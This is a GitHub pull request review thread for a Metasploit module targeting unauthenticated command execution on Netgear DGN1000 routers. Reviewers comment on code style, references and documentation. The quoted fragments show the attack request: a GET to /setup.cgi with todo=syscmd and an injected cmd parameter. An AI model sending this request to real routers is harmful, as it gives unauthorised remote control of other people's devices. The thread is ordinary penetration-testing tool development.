New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Netgear DGN1000 Unauthenticated OS Command execution #9106
Conversation
], | ||
'References' => | ||
[ | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
}, | ||
'Author' => [ | ||
'Mumbai <https://github.com/realoriginal>', # module | ||
'Robort Palerie' # vuln discovery |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
you should include Robort's email that is in the EDB module
'method' => 'GET' | ||
}) | ||
|
||
if [200, 301, 302, 401].include?(res.code) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
if res && ...
always remember to check for res.
}) | ||
|
||
if [200, 301, 302, 401].include?(res.code) | ||
return Exploit::CheckCode::Detected |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
so if ANY site EVER has setup.cgi its detected? Is there any unique item on the page to check for, or a disclosed version number on any unuath pages?
def execute_command(cmd, opts) | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => "/setup.cgi", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
'method' => 'GET', | ||
'vars_get' => { | ||
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
'vars_get' => { | ||
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
cmd.to_s
should work fine here instead of "#{cmd}"
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", | ||
'curpath' => "/", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", | ||
'curpath' => "/", | ||
'currentsetting.htm' => "1" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
single quotes
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
shit! will fix immeidately. forgot to fix these ughh
return Exploit::CheckCode::Unknown | ||
end | ||
|
||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove a space?
Fixed requested changes |
@h00die its weird, I keep adding the header yet the cli keeps marking it wrong. |
The error I'm seeing is: modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb - [ERROR] Exploit is missing a disclosure date |
Gotcha. Thank you! added it hopefully works |
Anyone have this router to test with? If not, @realoriginal would you be able to send a pcap of the check and exploitation (sanitized if you wish) to msfdev@metasploit.com ? |
Yes @h00die I will send a Pcap tommorow morning, is there a format which I should submit in the email, ie module name and stuff? |
You can put the PR number (PR: #9106) but nothing formal is required. I'll know! |
gotcha. Was able to do it, sent it in :D |
Was able to submit a PCAP a few hours later, you may notice the localhost for both dest and source, its due to proxy. Hopefully doesnt affect much @h00die |
], | ||
'References' => | ||
[ | ||
['EDB', '24464'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This doesn't look to be the same finding.
'References' => | ||
[ | ||
['EDB', '24464'], | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
['EDB', '25978']
just one last minor edit and it'll be ready to land! |
fixed. :D |
'References' => | ||
[ | ||
['EDB', '25978'], | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
dont need this line anymore
sorry, one last (bigger) thing, need some module docs on here. See https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md as a close example |
No problem. will bust em out rn. |
Done @h00die |
I did a few code cleanups: 210f6f8#diff-b29c8db7b12be9e30426bf7347cbd388 in the module added the default target and payload (per what you used). Cleaned up some spacing, and the module docs. |
Thanks for submitting and all the quick turn arounds! |
Release NotesAn exploit has been added for unauth RCE to netgear dgn1000 routers. |
thank you sir!. Will make sure to have this all done for any future models so you guys have less of a headache xD. Appreciate it |
This module exploits an unauthenticated OS command execution vulnerability, similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb.
Verification